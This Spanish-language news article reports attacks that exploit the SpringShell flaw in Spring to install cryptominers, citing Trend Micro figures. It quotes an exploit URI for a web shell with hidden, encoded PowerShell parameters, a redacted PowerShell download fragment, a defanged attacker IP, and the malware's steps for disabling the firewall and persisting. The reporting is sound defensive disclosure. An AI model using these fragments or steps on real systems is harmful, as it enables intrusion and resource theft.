Los piratas informáticos aprovechan la vulnerabilidad de SpringShell para instalar criptomineros

imágenes falsas

Los piratas informáticos maliciosos han estado bombardeando los servidores con ataques que explotan la vulnerabilidad SpringShell descubierta recientemente para instalar malware de criptominería, dijeron los investigadores.

SpringShell salió a la luz a fines del mes pasado cuando un investigador demostró cómo se puede usar para ejecutar código malicioso de forma remota en servidores que ejecutan las aplicaciones Spring Model View Controller o WebFlux en Java Development Kit versiones 9 o superior. Spring es el marco de Java más utilizado para desarrollar aplicaciones de nivel empresarial en Java. El marco es parte de un ecosistema más amplio que proporciona herramientas para cosas como la nube, los datos y las aplicaciones de seguridad.

A principios de este mes, la firma de seguridad Trend Micro anunció que había comenzado a detectar intentos. Del 1 al 12 de abril, los investigadores de la compañía detectaron un promedio de alrededor de 700 intentos por día de explotar la vulnerabilidad para instalar software de criptominería. Al ejecutar el malware en potentes servidores corporativos, los delincuentes pueden extraer Bitcoin u otros tipos de dinero digital utilizando los recursos y el poder de una víctima involuntaria.

El número de intentos de explotación alcanzó su punto máximo el 3 de abril con casi 3.000.

SpringShell exploit attempts

Tendencia Micro

Los piratas informáticos primero enviaron comandos destinados a determinar si los servidores comprometidos ejecutaban Windows o Linux. Luego ejecutaron un código de explotación que intentaba instalar un tipo de interfaz conocida como shell web, que permite a un usuario remoto ejecutar comandos a través de una ventana basada en la web.

El URI correspondiente al exploit cifrado se veía así, donde el shell web era zbc0fb.jsp y los parámetros w y l representaban las cargas útiles de Windows y Linux, que están codificadas en Base64.

/zbc0fb.jsp?w=powershell.exe+-NonI+-W+Hidden+-NoP+-Exec+Bypass+-Enc+ &l=echo+

Luego, un script de PowerShell intentó descargar y ejecutar el minero de criptomonedas. Trend editó el script en el siguiente fragmento:

$cc="http://"
$sys=-join ([char[] ](48..57+97..122) | Get-Random -Count (Get-Random (6..12)))
$dst="$env:AppData\$sys.exe"

El flujo de ejecución se veía así:

1. El cortafuegos se desactiva con la utilidad netsh.

2. Otros mineros de criptomonedas conocidos como kthreaddi, sysrv y sysrv012 son detenidos o eliminados.

3. Se detendrán otros procesos en ejecución que escuchen en los puertos 3333, 4444, 5555, 7777 y 9000.

4. Si el proceso kthreaddk no existe, el minero de criptomonedas descarga un binario, sys.exe, de 194[.] 145[.] 227[.] 21 a C:\Users\\AppData\Roaming\.exe.

5. El minero de criptomonedas luego inicia el proceso con una ventana oculta para evitar que el usuario vea señales visuales del proceso en ejecución.

6. Más tarde, se creará una tarea programada llamada «BrowserUpdate» para ejecutarse cada minuto. También cambia la clave de ejecución de Windows para ejecutar el binario sys.exe.

Los investigadores de Trend Micro no saben cuántos intentos de explotación han tenido éxito. A principios de este mes, los investigadores de la compañía dijeron que también habían descubierto intentos de explotar SpringShell para instalar la botnet Mirai. Cualquiera que ejecute las aplicaciones Spring Model View Controller o WebFlux en JDK versión 9 o posterior debería corregir el error lo antes posible.

DEJA UNA RESPUESTA

Por favor ingrese su comentario!
Por favor ingrese su nombre aquí